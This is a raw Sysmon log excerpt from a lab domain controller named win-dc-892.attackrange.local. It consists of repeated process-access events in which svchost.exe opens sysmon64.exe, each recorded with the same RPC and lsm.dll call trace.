12:01:01.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 